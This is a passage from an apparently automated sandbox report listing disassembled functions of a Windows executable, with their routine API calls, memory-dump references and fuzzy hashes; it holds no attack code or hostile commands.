                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: b933e48cc479ebd876a1f2a1e0456f7663a1db4da981dfbbbb2b213dcd6c33a5
                                      • Instruction ID: f4a99a99010aca68992e2c6305de7fdfaa1a6ae7f46e0386fcea21759b9dd4b3
                                      • Opcode Fuzzy Hash: b933e48cc479ebd876a1f2a1e0456f7663a1db4da981dfbbbb2b213dcd6c33a5
                                      • Instruction Fuzzy Hash: 6941CE62F1565284FB00DBB9E4507AD2721AF49BDCF181275EE1DF7A8ADE38D4828300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362738 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF65A36270D), ref: 00007FF65A362869
                                      • GetLastError.KERNEL32(?,00007FF65A36270D), ref: 00007FF65A362878
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                      • Instruction ID: 05edf1393b690ae27ebab9a67ebb7e2465397e7fc22b74fd660e65654e0133c8
                                      • Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                      • Instruction Fuzzy Hash: 4031E472F19A4286FE604F6AD940AB92790AF44BDCF1D1171DE1DE77A1DE3CE8828740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3522BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1746051919-0
                                      • Opcode ID: f869e1ad6fe17fa6b2403a971d0deef91c5c1ce91a4dc3bedbf5af38928ecb6f
                                      • Instruction ID: 171d568e741fb01191628c4a2daeb2b68b161a7084dff58fe102b3b1a7a78cb1
                                      • Opcode Fuzzy Hash: f869e1ad6fe17fa6b2403a971d0deef91c5c1ce91a4dc3bedbf5af38928ecb6f
                                      • Instruction Fuzzy Hash: 6C31C222A1978282EA149F59F44536E7361EF88798F584271EB9CE7B95DF3CE580C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362A90 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                      • Instruction ID: 23b44e77d0ee78428074895b97f1bf196dc3d3623eaaa88e187d6ac11630785f
                                      • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                      • Instruction Fuzzy Hash: BC21B022E0E74755EA718A91E5013BA6790EF41798F1E84B1DE4CE7391EE7CD48AC300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36AAA0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                      • Instruction ID: 6f1014503c6dd8fe685434e313e1ac69496291af300038e37087de783223d6b0
                                      • Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                      • Instruction Fuzzy Hash: DD115E71B08B4586EA009F16F844169B7A2BF89FC8F6846B5CA0DF3725DE7CE5418344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362B70 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                      • Instruction ID: aff43cd58ae45becef4702922effc082c859a37afa6d66831ce49ce909ba2d73
                                      • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                      • Instruction Fuzzy Hash: 02119D21E1864282FB608F65E4416696760EF45BA8F5943B1DA2DE73E4DF3DD886C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$RectText$ClientWindowswprintf
                                      • String ID:
                                      • API String ID: 402765569-0
                                      • Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                      • Instruction ID: 4825cb6a0ff62fe21f79ef610f341fe68d9b3f440a32eb2145f3078515222990
                                      • Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                      • Instruction Fuzzy Hash: 0E017120E0D64A41FF595796F4582799792AF8974CF1C04B4E80DE63D9DE2CE984C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36EAD4 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65A36EB29,?,?,?,?,00007FF65A365712,?,?,?,00007FF65A36569E), ref: 00007FF65A36EAD8
                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF65A36EAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                      • Instruction ID: 98d20084ff76187a91f4cb490abe3af0208c6ae1d4cfc3daf2353edb5f0c7a9b
                                      • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                      • Instruction Fuzzy Hash: 9FE02B61F1858687DF088F55D4414E9A391FFC8B44B888036D50BD3714DE2CE54D8B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A382150 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1173176844-0
                                      • Opcode ID: 0646b662c6caf26ca8bb2dc0f60ca6e00d23c2a3568bc0781e7d6fe9fe79912a
                                      • Instruction ID: 70af0d2d98ce91b0d67dad83b7ed06381ad5477bf2385883ab11d95de716472c
                                      • Opcode Fuzzy Hash: 0646b662c6caf26ca8bb2dc0f60ca6e00d23c2a3568bc0781e7d6fe9fe79912a
                                      • Instruction Fuzzy Hash: 57E01240E1B10B05FD1836E118651B901540F587BCE7C1BF0DF3DE82D6AD1CB5624110
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38D88C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                      • String ID:
                                      • API String ID: 588628887-0
                                      • Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                      • Instruction ID: d21c41de6eed7aabbae2eb396abe5ff24893cf74482fdb1eb2753916a9f009b1
                                      • Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                      • Instruction Fuzzy Hash: 6EE0EC50E0A64786FF58AFF2A8461B857D19F94B9DF0C40B4C90DE7291EF2CA4868620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3533E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 2f6a0a89bbd07f64e458e12061b98e9bd87d2c63ce1f8f54119cd6cd17c1ff9d
                                      • Instruction ID: f17f2d1d7dc40d535d95831abf0d4ddd7231dc0fbceb179528059fabfbaf1895
                                      • Opcode Fuzzy Hash: 2f6a0a89bbd07f64e458e12061b98e9bd87d2c63ce1f8f54119cd6cd17c1ff9d
                                      • Instruction Fuzzy Hash: 4AD1C772B0868256EB688B29E6542B977A1FF49BC8F0C04B5CB5DD77A1CF3CE4658700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A365254 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1017591355-0
                                      • Opcode ID: 5c40b76446255340c5d262157ec7654f8a2ee4ae9d13424f945488b1100eaa8f
                                      • Instruction ID: 0c2b054412b91718f88ab58ca26c1df99f7bfff5ae5fa893c324580ca2bc6b39
                                      • Opcode Fuzzy Hash: 5c40b76446255340c5d262157ec7654f8a2ee4ae9d13424f945488b1100eaa8f
                                      • Instruction Fuzzy Hash: 2C614612E0D24341FA659A26980627E6291AF41BDCF2C41F1EE4DF7BD5EE7CE4418210
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3717F0 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A36E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF65A36E8F0
                                        • Part of subcall function 00007FF65A36E8C4: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A36E90F
                                        • Part of subcall function 00007FF65A36E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF65A36E926
                                        • Part of subcall function 00007FF65A36E8C4: CloseHandle.KERNEL32 ref: 00007FF65A36E933
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A371A4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1624603282-0
                                      • Opcode ID: e795079a6edea56bef335adced2029c40f45edfcc92fcc337fe269507fbbd6aa
                                      • Instruction ID: 19d4835a36e8d8bcd0a0af4ab3e475c66e4da6554e77bdc159fb4581380e5c76
                                      • Opcode Fuzzy Hash: e795079a6edea56bef335adced2029c40f45edfcc92fcc337fe269507fbbd6aa
                                      • Instruction Fuzzy Hash: 6A61A263B16686A2EE08CB65D5540BC73A5FF41F98B184172DB2ED7AD1CF2CE5718300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35ECAC Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 3f163f76348f7732a813e490356459241e3afcb60505f443c62b2663502e283f
                                      • Instruction ID: 9cd0826c8c06ecf3037702a3f30964d880f87104f584267c09e8d26d776c147c
                                      • Opcode Fuzzy Hash: 3f163f76348f7732a813e490356459241e3afcb60505f443c62b2663502e283f
                                      • Instruction Fuzzy Hash: C951C662A0864241FA149B1AE4443BD6751FF8ABD8F5C01B6EE4DD7392CE3DE485C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35E7B8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A363E88: FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35E9A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1011579015-0
                                      • Opcode ID: a1d4ef8998a34a1d3b498b39c53fa5848762244e0c56bed900b2fa4669bedafd
                                      • Instruction ID: d2fa9226adf5ef3eeea28e6d212cc7dca00c57639575fd34380059b039b41caf
                                      • Opcode Fuzzy Hash: a1d4ef8998a34a1d3b498b39c53fa5848762244e0c56bed900b2fa4669bedafd
                                      • Instruction Fuzzy Hash: 32518F22A08A8681FA64CF69D44536D2361FF89B88F5C01B5DA8DE77A5DF2CE445C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36174C Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 0a6b65ba3c2ef67b0cfa03751de4ada799e5c7a8dedc28ec52f37c2c81ce86c7
                                      • Instruction ID: 079c92ebd2724a96119b8b90a3141b98cac883e7f89d87d2dba34b2e30d68055
                                      • Opcode Fuzzy Hash: 0a6b65ba3c2ef67b0cfa03751de4ada799e5c7a8dedc28ec52f37c2c81ce86c7
                                      • Instruction Fuzzy Hash: 7941D362B18A9641EE149A17EA4437AA6A1FF48BC4F4C8435EE4CE7F4ADF3CD4518300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A362F18 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
